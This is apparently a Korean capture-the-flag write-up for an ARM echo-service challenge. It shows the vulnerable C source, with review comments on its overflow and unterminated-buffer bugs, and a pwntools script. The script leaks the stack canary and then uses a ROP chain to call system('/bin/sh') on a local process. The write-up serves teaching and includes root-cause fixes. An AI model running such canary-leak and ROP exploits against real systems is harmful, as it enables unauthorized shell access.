ARM Pwnable 문제다. ARM 포너블은 처음 잡아봤다.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
/*
 * Echo service for a pwnable challenge: repeatedly reads a chunk from stdin
 * into a 40-byte stack buffer and prints it back with puts().
 *
 * Returns 0 when read() reports EOF or an error, or when the input is empty
 * after its trailing newline has been stripped.
 *
 * NOTE(review): two memory-safety defects are visible here and are the
 * subject of the write-up:
 *   1. read() is allowed 0x60 (96) bytes but buf holds only 40, so input can
 *      overwrite up to 56 bytes of stack beyond buf.
 *   2. buf is NUL-terminated only when the input ends in '\n'; otherwise
 *      puts() keeps printing whatever follows buf on the stack.
 * The root-cause fix is to bound the read by sizeof(buf) - 1 and to write the
 * terminator unconditionally at buf[len].
 */
int main()
{
/* Disable stdio buffering on both streams. */
setbuf(stdout, NULL);
setbuf(stdin, NULL);
char buf[40];
puts("Welcome to hxp's Echo Service!");
while (1)
{
printf("> ");
/* Length limit (0x60) exceeds the size of buf (40): stack buffer overflow. */
ssize_t len = read(0, buf, 0x60);
/* EOF or read error ends the program. */
if (len <= 0) return 0;
/* Only a trailing newline is replaced by a terminator; read() itself never
 * appends one, so input without '\n' leaves buf unterminated. */
if (buf[len - 1] == '\n') buf[--len] = 0;
/* A bare newline ends the loop by returning from main(). */
if (len == 0) return 0;
/* puts() stops at the first NUL byte, which may lie past the end of buf
 * (out-of-bounds read that discloses adjacent stack contents). */
puts(buf);
}
}
/* Stores the address of system() in a global, so the program references that
 * function even though main() never calls it.
 * NOTE(review): presumably present so that system() is kept in the final
 * binary for the challenge; confirm against the build configuration. */
const void* foo = system;
exploit.py
from pwn import *
# Write-up script for the echo service above, run against a local copy of the
# binary. It relies on the two defects in main(): the oversized read() and the
# missing NUL terminator before puts().
# NOTE(review): the payload is built by concatenating str literals with p32()
# output; under Python 3 that concatenation raises TypeError, so the script
# appears to target Python 2 -- confirm the interpreter before reuse.
context.log_level = 'debug'  # verbose pwntools logging of all traffic
e = ELF('./canary')  # loaded but not referenced again in this script
p = process('./canary')  # local process only; no remote target is involved

# Step 1: information leak. 41 bytes fill the 40-byte buffer and replace the
# first byte that follows it. The input has no trailing newline, so the service
# does not terminate the buffer and puts() echoes the bytes stored after it.
p.sendafter('> ','A'*41)
p.recvuntil('A'*40)
# The next 4 echoed bytes are unpacked as a 32-bit value; subtracting 0x41
# ('A') undoes the one-byte overwrite. This is only correct if the original
# low byte was 0x00, which the script assumes for the stack canary.
canary = u32(p.recv(4)) - 0x41

# Hard-coded addresses inside the binary. They are valid only if the binary is
# loaded at a fixed base; presumably it is non-PIE and statically linked --
# confirm against the build. Position-independent builds with ASLR would
# invalidate these constants.
binsh = 0x71EB0
system = 0x16d90
popret = 0x00026b7c # pop {r0, r4, pc}

# Step 2: overwrite the stack past the buffer while writing the leaked canary
# value back in place, so the stack-protector check still passes.
payload = 'A'*40  # fills buf
payload += p32(canary)  # restores the canary value
payload += 'A'*12  # filler up to the saved return address (build-specific offset; verify)
payload += p32(popret)  # return address -> pop {r0, r4, pc}
payload += p32(binsh)  # popped into r0 (first argument register on ARM)
payload += 'A'*4  # popped into r4 (unused)
payload += p32(system)  # popped into pc
p.sendafter('> ',payload)
# An empty line makes main() return (len == 0 after the newline is stripped),
# which is when the overwritten return address is used.
p.sendlineafter('> ','')
p.interactive()
# Mitigation: fix the root cause in the service (bound read() by
# sizeof(buf) - 1 and always NUL-terminate). The canary alone does not help
# once the unterminated buffer lets puts() disclose it.